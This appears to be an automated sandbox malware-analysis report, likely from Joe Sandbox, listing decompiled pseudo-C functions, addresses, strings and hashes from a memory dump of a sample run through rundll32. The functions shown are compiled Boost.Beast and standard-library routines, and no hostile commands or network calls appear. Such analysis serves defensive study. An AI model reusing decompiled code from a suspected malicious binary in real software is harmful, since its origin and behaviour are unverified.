                                        0x21ef312bb84
                                        0x21ef312bb86
                                        0x21ef312bb8a
                                        0x21ef312bb8f
                                        0x21ef312bb91
                                        0x21ef312bb96
                                        0x21ef312bb9b
                                        0x21ef312bb9d
                                        0x21ef312bba2
                                        0x21ef312bba8
                                        0x21ef312bbac
                                        0x21ef312bbb1
                                        0x21ef312bbb3
                                        0x21ef312bbb7
                                        0x21ef312bbbb
                                        0x21ef312bbbf
                                        0x21ef312bbc4
                                        0x21ef312bbc6
                                        0x21ef312bbdc
                                        0x21ef312bbe5
                                        0x21ef312bbe7
                                        0x21ef312bbee
                                        0x21ef312bbf3
                                        0x21ef312bbf8
                                        0x21ef312bbfe
                                        0x21ef312bc02
                                        0x21ef312bc07
                                        0x21ef312bc1e
                                        0x21ef312bc28
                                        0x21ef312bc2a
                                        0x21ef312bc31
                                        0x21ef312bc37
                                        0x21ef312bc3d
                                        0x21ef312bc44
                                        0x21ef312bc46
                                        0x21ef312bc5d
                                        0x21ef312bc5f
                                        0x21ef312bc63
                                        0x21ef312bc67
                                        0x21ef312bc69
                                        0x21ef312bc80
                                        0x21ef312bc82
                                        0x21ef312bc86
                                        0x21ef312bc8a
                                        0x21ef312bc8c
                                        0x21ef312bca3
                                        0x21ef312bca9
                                        0x21ef312bcad
                                        0x21ef312bcb6
                                        0x21ef312bcb8
                                        0x21ef312bcbd
                                        0x21ef312bcc2
                                        0x21ef312bce4

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: =$UTF-16LEUNICODE$UTF-8$ccs
                                        • API String ID: 3215553584-1047608489
                                        • Opcode ID: 96cf8fe9c0719356fadf82345b90979ccc2b9001b6df5a069cf9f7b1f1e7c23e
                                        • Instruction ID: 701d103f047d5ce14ddd30b7652bd65bef6f75f8b0d5fdaa01e01940422f9890
                                        • Opcode Fuzzy Hash: 96cf8fe9c0719356fadf82345b90979ccc2b9001b6df5a069cf9f7b1f1e7c23e
                                        • Instruction Fuzzy Hash: D4817872A006008AFF788F259E593EF6AF0EB31744F16C415EE1247E99E76CC8A2D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30036D0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 193COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 47%
                                        			E0000021E21EF30036D0(void* __ebx, void* __edx, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi, void* __r8, intOrPtr* __r9, char _a16) {
				void* _v40;
				char _v104;
				char _v168;
				char _v256;
				char _v272;
				long long _v288;
				long long _v296;
				char _v312;
				char _v320;
				char _v328;
				char _v336;
				char _v344;
				long long _v352;
				char _v360;
				char _v368;
				char _v392;
				long long _v400;
				char _v408;
				void* __rdi;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t122;
				long long _t124;
				long long _t128;
				void* _t130;
				intOrPtr* _t143;
				long long _t149;
				void* _t153;
				void* _t163;
				intOrPtr _t169;
				void* _t180;
				intOrPtr* _t181;
				void* _t184;
				void* _t186;
				void* _t192;
				long long _t199;
				void* _t201;
				void* _t202;
				void* _t204;
				void* _t207;

				_t99 = __edx;
				_t96 = __ebx;
				_t122 = _t186;
				 *((long long*)(_t122 + 0x20)) = __r9;
				 *((long long*)(_t122 - 0x118)) = 0xfffffffe;
				 *((long long*)(_t122 + 8)) = __rbx;
				 *((long long*)(_t122 + 0x18)) = __rsi;
				_t143 = __r9;
				_t184 = __r8;
				_t181 = __rdx;
				_t202 = __rcx;
				r12d = 0;
				r15d = r12d;
				_a16 = _t199;
				if ( *((intOrPtr*)(__rdx + 0x10)) ==  *((intOrPtr*)(__rdx + 8))) goto 0xf300379c;
				_t124 =  *((intOrPtr*)(__rdx + 8));
				_v296 = _t124;
				_v288 =  *((intOrPtr*)(__rdx + 0x10)) - _t124;
				E0000021E21EF3004130();
				_t149 = _t124;
				_a16 = _t207 + _t124;
				_t169 =  *((intOrPtr*)(__rdx + 8));
				if (_t149 -  *((intOrPtr*)(__rdx + 0x10)) - _t169 < 0) goto 0xf3003773;
				 *((long long*)(__rdx + 0x10)) =  *__rdx;
				goto 0xf3003777;
				_t128 = _t169 + _t149;
				 *((long long*)(__rdx + 8)) = _t128;
				if ( *__r9 == 0) goto 0xf3003a01;
				E0000021E21EF2FF0490(_t149, _t169);
				if ( *((intOrPtr*)(__r9 + 8)) != _t128) goto 0xf3003a01;
				if ( *__r9 != 3) goto 0xf3003a01;
				_v392 = 0;
				_v336 = 0x10000;
				_t130 =  *((intOrPtr*)(__rdx + 0x10)) -  *((intOrPtr*)(__rdx + 8));
				_v344 =  *((intOrPtr*)(__rdx + 0x28)) - _t130;
				_v328 =  *((intOrPtr*)(__rdx + 0x20)) -  *__rdx - _t130;
				_v320 = 0x200;
				_t192 =  >=  ?  &_v336 :  &_v344;
				_t153 =  <=  ?  &_v320 :  &_v328;
				_t154 =  <  ? _t192 : _t153;
				_t193 =  *((intOrPtr*)( <  ? _t192 : _t153));
				_t110 =  *((intOrPtr*)( <  ? _t192 : _t153));
				if ( *((intOrPtr*)( <  ? _t192 : _t153)) != 0) goto 0xf30038cd;
				_v368 = 0xf319d200;
				_v360 = 0xf319d200;
				_v352 = 0xf319d200;
				_v408 = "buffer overflow";
				_v400 = 1;
				E0000021E21EF310E0E4(__r9,  &_v408,  &_v360, __rdx, __r8);
				_v368 = 0xf319d240;
				_v368 = 0xf319d270;
				E0000021E21EF2FFE350(__r9,  &_v168,  &_v368);
				 *0x21EF319D298 = "unsigned __int64 __cdecl boost::beast::read_size_or_throw<class boost::beast::basic_flat_buffer<class std::allocator<char> >>(class boost::beast::basic_flat_buffer<class std::allocator<char> > &,unsigned __int64)";
				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/read_size.ipp";
				 *0x21EF319D2A8 = 0x49;
				E0000021E21EF30012E0(0xf319d270,  &_v104);
				E0000021E21EF3001320(_t96, __r9,  &_v256, 0xf319d270, _t184);
				E0000021E21EF31103EC(__r9,  &_v256, 0xf31e4b98, _t184, _t207);
				E0000021E21EF3003DD0(_t96, _t97, _t99, _t143, __rdx,  &_v272,  *((intOrPtr*)( <  ? _t192 : _t153)));
				_v392 = 0;
				asm("movups xmm0, [eax]");
				asm("movups [esp+0x38], xmm0");
				_v392 = 1;
				asm("movups xmm0, [esp+0x38]");
				asm("movups [esp+0x80], xmm0");
				_t163 = _t202 + 8;
				E0000021E21EF3006370(_t99, _t100, _t101, _t143, _t163, _t202 + 0x70, _t184,  &_v312, _t143);
				0xf2fee810(_t204, _t201, _t199, _t180);
				if ( *((intOrPtr*)(_t143 + 8)) != 0xf319d270) goto 0xf3003994;
				if ( *_t143 != 2) goto 0xf3003994;
				_t98 =  *((intOrPtr*)(_t184 + 0x30));
				if (_t98 == 0) goto 0xf3003978;
				if (_t163 - 1 - 1 <= 0) goto 0xf3003955;
				if (( *(_t184 + 0x34) & 0x00000c00) == 0) goto 0xf3003949;
				if (_t98 != 0xa) goto 0xf3003955;
				 *_t143 = r12d;
				goto 0xf3003976;
				 *_t143 = r12d;
				 *((intOrPtr*)(_t184 + 0x30)) = 0xa;
				goto 0xf300396f;
				E0000021E21EF2FF0490(_t163, _t202 + 0x70);
				_v408 = 2;
				_v400 = 0xf319d270;
				asm("movups xmm0, [esp+0x20]");
				asm("movups [ebx], xmm0");
				if ( *_t143 == 0) goto 0xf3003976;
				goto 0xf30039f5;
				goto 0xf30039f5;
				_t95 = E0000021E21EF2FF0490(_t163, _t202 + 0x70);
				_v408 = 1;
				_v400 = 0xf319d270;
				asm("movups xmm0, [esp+0x20]");
				asm("movups [ebx], xmm0");
				goto 0xf30039f5;
				if ( *_t143 == 0) goto 0xf300399b;
				goto 0xf30039fc;
				_v312 = 0xf319d270;
				_a16 =  *((intOrPtr*)(_t181 + 0x18)) -  *((intOrPtr*)(_t181 + 0x10));
				_t139 =  >=  ?  &_v312 :  &_a16;
				_t166 =  *((intOrPtr*)( >=  ?  &_v312 :  &_a16));
				 *((intOrPtr*)(_t181 + 0x10)) =  *((intOrPtr*)(_t181 + 0x10)) +  *((intOrPtr*)( >=  ?  &_v312 :  &_a16));
				if (_v392 == 0) goto 0xf300371e;
				_v392 = 0;
				_v392 = 0;
				goto 0xf3003a04;
				if (_v392 == 0) goto 0xf3003a01;
				_v392 = 0;
				return _t95;
			}
















































                                        0x21ef30036d0
                                        0x21ef30036d0
                                        0x21ef30036d0
                                        0x21ef30036d3
                                        0x21ef30036e7
                                        0x21ef30036f2
                                        0x21ef30036f6
                                        0x21ef30036fa
                                        0x21ef30036fd
                                        0x21ef3003700
                                        0x21ef3003703
                                        0x21ef3003706
                                        0x21ef3003709
                                        0x21ef300370c
                                        0x21ef300371c
                                        0x21ef300371e
                                        0x21ef3003729
                                        0x21ef3003731
                                        0x21ef3003747
                                        0x21ef300374c
                                        0x21ef3003752
                                        0x21ef300375a
                                        0x21ef3003768
                                        0x21ef300376d
                                        0x21ef3003771
                                        0x21ef3003773
                                        0x21ef3003777
                                        0x21ef300377e
                                        0x21ef3003784
                                        0x21ef300378d
                                        0x21ef3003796
                                        0x21ef300379c
                                        0x21ef30037a1
                                        0x21ef30037ae
                                        0x21ef30037b9
                                        0x21ef30037c8
                                        0x21ef30037cd
                                        0x21ef30037e7
                                        0x21ef30037fc
                                        0x21ef3003806
                                        0x21ef300380a
                                        0x21ef300380d
                                        0x21ef3003810
                                        0x21ef300381d
                                        0x21ef3003824
                                        0x21ef3003829
                                        0x21ef3003835
                                        0x21ef300383a
                                        0x21ef3003849
                                        0x21ef3003856
                                        0x21ef3003862
                                        0x21ef3003874
                                        0x21ef3003881
                                        0x21ef300388c
                                        0x21ef3003890
                                        0x21ef30038a2
                                        0x21ef30038b3
                                        0x21ef30038c7
                                        0x21ef30038d8
                                        0x21ef30038dd
                                        0x21ef30038e2
                                        0x21ef30038e5
                                        0x21ef30038ea
                                        0x21ef30038ef
                                        0x21ef30038f4
                                        0x21ef3003900
                                        0x21ef300390f
                                        0x21ef3003917
                                        0x21ef3003920
                                        0x21ef3003925
                                        0x21ef3003927
                                        0x21ef300392c
                                        0x21ef3003934
                                        0x21ef300393d
                                        0x21ef3003942
                                        0x21ef3003944
                                        0x21ef3003947
                                        0x21ef3003949
                                        0x21ef300394c
                                        0x21ef3003953
                                        0x21ef3003955
                                        0x21ef300395a
                                        0x21ef3003962
                                        0x21ef3003967
                                        0x21ef300396c
                                        0x21ef3003972
                                        0x21ef3003974
                                        0x21ef3003976
                                        0x21ef3003978
                                        0x21ef300397d
                                        0x21ef3003985
                                        0x21ef300398a
                                        0x21ef300398f
                                        0x21ef3003992
                                        0x21ef3003997
                                        0x21ef3003999
                                        0x21ef300399b
                                        0x21ef30039ab
                                        0x21ef30039c6
                                        0x21ef30039ca
                                        0x21ef30039cd
                                        0x21ef30039d6
                                        0x21ef30039dc
                                        0x21ef30039e6
                                        0x21ef30039f3
                                        0x21ef30039fa
                                        0x21ef30039fc
                                        0x21ef3003a20

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/read_size.ipp, xrefs: 0000021EF3003885
                                        • buffer overflow, xrefs: 0000021EF300382E
                                        • unsigned __int64 __cdecl boost::beast::read_size_or_throw<class boost::beast::basic_flat_buffer<class std::allocator<char> >>(class boost::beast::basic_flat_buffer<class std::allocator<char> > &,unsigned __int64), xrefs: 0000021EF300387A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionInit_thread_footerThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/read_size.ipp$buffer overflow$unsigned __int64 __cdecl boost::beast::read_size_or_throw<class boost::beast::basic_flat_buffer<class std::allocator<char> >>(class boost::beast::basic_flat_buffer<class std::allocator<char> > &,unsigned __int64)
                                        • API String ID: 2442327695-298877101
                                        • Opcode ID: 428a661fd4f02053ae22cb7ca82f3a0d719971b30746026bd7e24d509bd19917
                                        • Instruction ID: 0fabf6fc6377c6d6e9561989cc1e050dd25308ac22593d2b1c10af3521643927
                                        • Opcode Fuzzy Hash: 428a661fd4f02053ae22cb7ca82f3a0d719971b30746026bd7e24d509bd19917
                                        • Instruction Fuzzy Hash: CE915C72218B8096EB62CB25E8883DA77A5F3A5784F118126DF8D03FA9DB3CC595C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEB0F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FEB0F0(signed int __eax, intOrPtr* __rcx) {
				intOrPtr _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t48;
				signed long long _t50;
				signed long long _t52;
				void* _t55;
				intOrPtr _t58;
				void* _t60;
				intOrPtr _t65;

				_t43 =  *((intOrPtr*)(__rcx + 0x10));
				_t58 =  *((intOrPtr*)(__rcx + 8));
				_t48 = _t43 - _t58;
				_t50 = (_t48 >> 5) + (_t48 >> 5 >> 0x3f);
				if (_t50 - 1 >= 0) goto 0xf2feb1a2;
				_t65 =  *__rcx;
				_t52 = (_t50 >> 5) + (_t50 >> 5 >> 0x3f);
				if (0x49249249 - _t52 - 1 < 0) goto 0xf2feb1a8;
				_t44 = _t43 - _t65;
				_t11 = _t52 + 1; // 0x24924924924924a
				_t60 = _t11;
				_t45 =  >=  ? ((_t52 >> 5) + (_t52 >> 5 >> 0x3f) >> 1) + (_t52 >> 5) + (_t52 >> 5 >> 0x3f) : _t44;
				_t61 =  >=  ? _t45 : _t60;
				_t55 =  >=  ? _t45 : _t60;
				goto 0xf2feb350;
				return __eax * _t48 * (_t58 - _t65) * _t44;
			}













                                        0x21ef2feb103
                                        0x21ef2feb10d
                                        0x21ef2feb111
                                        0x21ef2feb122
                                        0x21ef2feb129
                                        0x21ef2feb12b
                                        0x21ef2feb14c
                                        0x21ef2feb159
                                        0x21ef2feb15b
                                        0x21ef2feb15e
                                        0x21ef2feb15e
                                        0x21ef2feb187
                                        0x21ef2feb18e
                                        0x21ef2feb195
                                        0x21ef2feb19d
                                        0x21ef2feb1a7

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID: vector<T> too long
                                        • API String ID: 118556049-3788999226
                                        • Opcode ID: 44cd2ca73303036ace4a453a64e364fb1f3eec8ec989feef0f00846f35ecab5e
                                        • Instruction ID: 77152a534e8f3cb64d32d4cc0a032d1e09545a66a302f6d82d844e208f2b91c6
                                        • Opcode Fuzzy Hash: 44cd2ca73303036ace4a453a64e364fb1f3eec8ec989feef0f00846f35ecab5e
                                        • Instruction Fuzzy Hash: E54126F7710B4942EE0CCF56EC292D95261B7A9FD0F5591229E6D1BBC9DF38D0928340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF9030 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FF9030(void* __eax, void* __rcx, long long __rdx, void* __r8, long long __r9, long long _a16, long long _a32, long long _a40) {
				intOrPtr _t50;
				intOrPtr _t51;

				_a32 = __r9;
				_a16 = __rdx;
				if (__rcx == __r8) goto 0xf2ff9066;
				_t50 =  *((intOrPtr*)(__rcx + 8));
				if (0x66666665 - _t50 - 1 < 0) goto 0xf2ff90ca;
				 *((long long*)(__rcx + 8)) = _t50 + 1;
				 *((long long*)(__r8 + 8)) =  *((long long*)(__r8 + 8)) - 1;
				 *((long long*)( *((intOrPtr*)(__r9 + 8)))) = _a40;
				 *((long long*)( *((intOrPtr*)(_a40 + 8)))) = _a16;
				 *((long long*)( *((intOrPtr*)(_a16 + 8)))) = _a32;
				_t51 = _a16;
				 *((long long*)(_t51 + 8)) =  *((intOrPtr*)(_a40 + 8));
				 *((long long*)(_a40 + 8)) =  *((intOrPtr*)(_a32 + 8));
				 *((long long*)(_a32 + 8)) =  *((intOrPtr*)(_t51 + 8));
				return __eax;
			}





                                        0x21ef2ff9030
                                        0x21ef2ff9035
                                        0x21ef2ff9041
                                        0x21ef2ff9043
                                        0x21ef2ff9058
                                        0x21ef2ff905e
                                        0x21ef2ff9062
                                        0x21ef2ff906f
                                        0x21ef2ff9080
                                        0x21ef2ff9091
                                        0x21ef2ff9099
                                        0x21ef2ff90a6
                                        0x21ef2ff90b8
                                        0x21ef2ff90c1
                                        0x21ef2ff90c9

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task$ExceptionThrowstd::bad_alloc::bad_alloc
                                        • String ID: list<T> too long
                                        • API String ID: 2386360001-4027344264
                                        • Opcode ID: 17c40ecb0d7b6d9113e4e2e546de7c814964e84a63c55f93f10868ba96ea6c50
                                        • Instruction ID: de841f0925facc932c12aef76f0723d1feac64946467d26822076a341734d8ce
                                        • Opcode Fuzzy Hash: 17c40ecb0d7b6d9113e4e2e546de7c814964e84a63c55f93f10868ba96ea6c50
                                        • Instruction Fuzzy Hash: 5B515EB7611B8481EE10DB16E888199B7F4F798FD0F168622DE9D53BA9DF38C492C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF300B6D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E0000021E21EF300B6D0(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9) {
				void* _v8;
				char _v80;
				char _v144;
				char _v232;
				long long _v240;
				char _v248;
				char _v256;
				long long _v264;
				char _v272;
				char _v280;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				char* _t62;
				void* _t65;
				void* _t66;
				char* _t75;
				void* _t88;
				intOrPtr* _t90;
				void* _t93;
				void* _t99;
				void* _t112;

				_t43 = __ebx;
				_t54 = _t99;
				_v240 = 0xfffffffe;
				 *((long long*)(_t54 + 8)) = __rbx;
				 *((long long*)(_t54 + 0x10)) = __rbp;
				 *((long long*)(_t54 + 0x18)) = __rsi;
				 *((long long*)(_t54 + 0x20)) = __rdi;
				_t93 = __r8;
				_t90 = __rcx;
				_t65 = __r9 - __r8;
				_t103 =  *__rcx;
				_t50 =  *__rcx + _t65 - 0x1000;
				if (_t50 <= 0) goto 0xf300b7cb;
				_v280 = 0xf319d200;
				_v272 = 0xf319d200;
				_v264 = 0xf319d200;
				_v256 = "size() + count > max_size()";
				_v248 = 1;
				E0000021E21EF310E0E4(_t65,  &_v256,  &_v272, __rcx, __r8);
				_v280 = 0xf319d240;
				_v280 = 0xf319d270;
				E0000021E21EF2FFE350(_t65,  &_v144,  &_v280);
				 *0x21EF319D298 = "char *__cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::insert<const char*>(const char *,const char *,const char *)";
				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/static_string.ipp";
				 *0x21EF319D2A8 = 0x154;
				E0000021E21EF30012E0(0xf319d270,  &_v80);
				E0000021E21EF3001320(_t43, _t65,  &_v232, 0xf319d270, _t93);
				_t75 =  &_v232;
				E0000021E21EF31103EC(_t65, _t75, 0xf31e4b98, _t93);
				_t112 = __rdx - _t90 - 8;
				if (_t50 == 0) goto 0xf300b7ee;
				_t88 = _t75 + 8 + _t112;
				_t42 = E0000021E21EF310DC90(_t44, _t47, _t48, _t49, _t75 + 8 + _t112 + _t65, _t88, _t90, _t93, _t103 - _t112);
				 *_t90 =  *_t90 + _t65;
				_t62 = _t90 + 8 + _t112;
				_t66 =  >  ? _t88 : _t65;
				if (_t66 == 0) goto 0xf300b832;
				asm("o16 nop [eax+eax]");
				 *_t62 =  *(_t93 - _t62 + _t62) & 0x000000ff;
				if (_t62 - _t62 + 1 != _t66) goto 0xf300b820;
				 *((char*)( *_t90 + _t90 + 8)) = 0;
				return _t42;
			}






























                                        0x21ef300b6d0
                                        0x21ef300b6d0
                                        0x21ef300b6dc
                                        0x21ef300b6e5
                                        0x21ef300b6e9
                                        0x21ef300b6ed
                                        0x21ef300b6f1
                                        0x21ef300b6f8
                                        0x21ef300b6fe
                                        0x21ef300b704
                                        0x21ef300b707
                                        0x21ef300b70e
                                        0x21ef300b714
                                        0x21ef300b721
                                        0x21ef300b728
                                        0x21ef300b72d
                                        0x21ef300b739
                                        0x21ef300b73e
                                        0x21ef300b74d
                                        0x21ef300b75a
                                        0x21ef300b766
                                        0x21ef300b778
                                        0x21ef300b785
                                        0x21ef300b790
                                        0x21ef300b794
                                        0x21ef300b7a6
                                        0x21ef300b7b4
                                        0x21ef300b7c0
                                        0x21ef300b7c5
                                        0x21ef300b7ce
                                        0x21ef300b7d5
                                        0x21ef300b7db
                                        0x21ef300b7e9
                                        0x21ef300b7ee
                                        0x21ef300b7f5
                                        0x21ef300b800
                                        0x21ef300b807
                                        0x21ef300b816
                                        0x21ef300b824
                                        0x21ef300b830
                                        0x21ef300b835
                                        0x21ef300b857

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/static_string.ipp, xrefs: 0000021EF300B789
                                        • char *__cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::insert<const char*>(const char *,const char *,const char *), xrefs: 0000021EF300B77E
                                        • size() + count > max_size(), xrefs: 0000021EF300B732
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/static_string.ipp$char *__cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::insert<const char*>(const char *,const char *,const char *)$size() + count > max_size()
                                        • API String ID: 3608347590-1011254617
                                        • Opcode ID: b678627a2dad7319736bef4af23ca5f160cf9a88d1743368fb915299e5dcfd8b
                                        • Instruction ID: 7f6bc409695f3596a59ff9fcfd187a43dc34a12fde3e1fd84dda37c177f208a9
                                        • Opcode Fuzzy Hash: b678627a2dad7319736bef4af23ca5f160cf9a88d1743368fb915299e5dcfd8b
                                        • Instruction Fuzzy Hash: EC41B072211B8086DE10CB11E8883CAB7A5F7A8B84F568226DE9D43B64EF3CC556C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3013440 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 36%
                                        			E0000021E21EF3013440() {
				char _v32;
				char _v40;
				long long _v104;
				char _v112;
				char _v120;
				char _v128;
				char _v136;
				long long _v144;
				signed int _t38;
				void* _t59;
				intOrPtr* _t61;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t72;

				_t72 = _t70;
				 *((long long*)(_t72 - 0x38)) = 0xfffffffe;
				 *((long long*)(_t72 - 0x20)) = 0xf319d200;
				 *((long long*)(_t72 - 0x18)) = 0xf319d200;
				 *((long long*)(_t72 - 0x10)) = 0xf319d200;
				 *((long long*)(_t72 - 0x30)) = "invalid iterator";
				_v40 = 1;
				E0000021E21EF310E0E4(_t59, _t72 - 0x30, _t72 - 0x18, _t68, _t69);
				_v32 = 0xf319d240;
				r9d = 0xc2;
				_t61 =  &_v32;
				E0000021E21EF3010190(0xf319d240, _t59, _t61, "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,6> &) const", _t68);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_v144 = 0xfffffffe;
				_t38 =  *(_t61 + 0x10) & 0x000000ff;
				if (_t38 != 7) goto 0xf30134f9;
				 *((long long*)(_t61 + 8)) =  *((long long*)(_t61 + 8)) + 0x10;
				if ( *((intOrPtr*)(_t61 + 8)) !=  *_t61 + 0x18) goto 0xf301357c;
				if ( *(_t61 + 0x10) == 0) goto 0xf30134e5;
				 *(_t61 + 0x10) = 0;
				 *((long long*)(_t61 + 8)) = 0xf3204a34;
				 *(_t61 + 0x10) = 8;
				goto 0xf301357c;
				if (_t38 != 8) goto 0xf301351f;
				 *((long long*)(_t61 + 8)) =  *((long long*)(_t61 + 8)) + 2;
				if ( *((intOrPtr*)(_t61 + 8)) != 0xf3204a36) goto 0xf301357c;
				if ( *(_t61 + 0x10) == 0) goto 0xf3013519;
				 *(_t61 + 0x10) = 0;
				 *(_t61 + 0x10) = 9;
				goto 0xf301357c;
				_v120 = 0xf319d200;
				_v112 = 0xf319d200;
				_v104 = 0xf319d200;
				_v136 = "invalid iterator";
				_v128 = 1;
				E0000021E21EF310E0E4(_t59,  &_v136,  &_v112, _t68, _t69);
				_v120 = 0xf319d240;
				r9d = 0xd9;
				return E0000021E21EF3010190(0xf319d240, _t59,  &_v120, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,8> &)", _t68);
			}


















                                        0x21ef3013440
                                        0x21ef3013447
                                        0x21ef3013456
                                        0x21ef301345c
                                        0x21ef3013460
                                        0x21ef301346b
                                        0x21ef301346f
                                        0x21ef301347c
                                        0x21ef3013489
                                        0x21ef301348e
                                        0x21ef301349b
                                        0x21ef30134a0
                                        0x21ef30134a5
                                        0x21ef30134a6
                                        0x21ef30134a7
                                        0x21ef30134a8
                                        0x21ef30134a9
                                        0x21ef30134aa
                                        0x21ef30134ab
                                        0x21ef30134ac
                                        0x21ef30134ad
                                        0x21ef30134ae
                                        0x21ef30134af
                                        0x21ef30134b4
                                        0x21ef30134bd
                                        0x21ef30134c3
                                        0x21ef30134c5
                                        0x21ef30134d5
                                        0x21ef30134df
                                        0x21ef30134e1
                                        0x21ef30134ec
                                        0x21ef30134f0
                                        0x21ef30134f4
                                        0x21ef30134fb
                                        0x21ef30134fd
                                        0x21ef301350d
                                        0x21ef3013513
                                        0x21ef3013515
                                        0x21ef3013519
                                        0x21ef301351d
                                        0x21ef3013526
                                        0x21ef301352d
                                        0x21ef3013532
                                        0x21ef301353e
                                        0x21ef3013543
                                        0x21ef3013552
                                        0x21ef301355f
                                        0x21ef3013564
                                        0x21ef3013580

                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF3013464, 0000021EF3013537
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea, xrefs: 0000021EF3013494
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer, xrefs: 0000021EF301356A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy$ExceptionThrow
